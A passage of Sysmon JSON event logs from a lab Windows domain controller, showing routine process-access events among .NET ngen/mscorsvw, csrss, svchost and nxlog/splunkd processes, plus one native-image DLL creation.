9\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:49.446","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12E5-5F25-0000-00103D280A00}","TargetProcessId":"4180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7034,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:49.446\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12E5-5F25-0000-00103D280A00}\r\nTargetProcessId: 4180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:49.446","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12E5-5F25-0000-00103D280A00}","TargetProcessId":"4180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7035,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:49.446\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12E5-5F25-0000-00103D280A00}\r\nTargetProcessId: 4180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:49.446","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12E5-5F25-0000-00103D280A00}","TargetProcessId":"4180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7036,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:49.556\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:49.556","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7037,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:49.649\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12E5-5F25-0000-00103A2C0A00}\r\nTargetProcessId: 3956\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:49.649","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12E5-5F25-0000-00103A2C0A00}","TargetProcessId":"3956","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7038,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:49.649\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12E5-5F25-0000-00103A2C0A00}\r\nTargetProcessId: 3956\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:49.649","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12E5-5F25-0000-00103A2C0A00}","TargetProcessId":"3956","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7039,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:49.649\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12E5-5F25-0000-00103A2C0A00}\r\nTargetProcessId: 3956\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:49.649","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12E5-5F25-0000-00103A2C0A00}","TargetProcessId":"3956","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7040,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:50.556\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:50.556","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7041,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:59:51.024\r\nProcessGuid: {E2A3D6B1-12E5-5F25-0000-00103A2C0A00}\r\nProcessId: 3956\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f74-0\\Microsoft.VisualBasic.dll\r\nCreationUtcTime: 2020-08-01 06:59:51.024","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:59:51.024","ProcessGuid":"{E2A3D6B1-12E5-5F25-0000-00103A2C0A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f74-0\\Microsoft.VisualBasic.dll","CreationUtcTime":"2020-08-01 06:59:51.024","EventReceivedTime":"2020-08-01 06:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
